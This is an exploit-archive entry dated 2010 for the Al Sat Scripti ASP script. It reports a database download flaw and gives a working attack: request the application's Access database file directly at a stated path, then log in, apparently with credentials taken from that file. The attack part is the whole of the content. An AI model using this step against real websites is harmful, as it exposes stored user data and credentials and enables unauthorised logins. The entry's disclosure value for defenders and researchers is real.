id: 11140
date: 03/02/2010
title: Al Sat Scripti Database Download Vulnerability
author: indoushka
cves: 

==============================================
Al Sat Scripti Database Download Vulnerability
==============================================

========================================================================================                 
| # Title    : Al Sat Scripti Data Bass Download Vulnerability
| # Author   : indoushka      
| # Web Site : http://scripti.org/i/ucuzalsat.zip                        
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) IIS 5.1                             
| # Bug      : ASP DB Download                                                                   
======================      Exploit By indoushka       =================================
 # Exploit  :
 
1- http://127.0.0.1/ucuzalsat/ucuzalsat.mdb
 
2- login



#  0day.today [2023-03-23]  #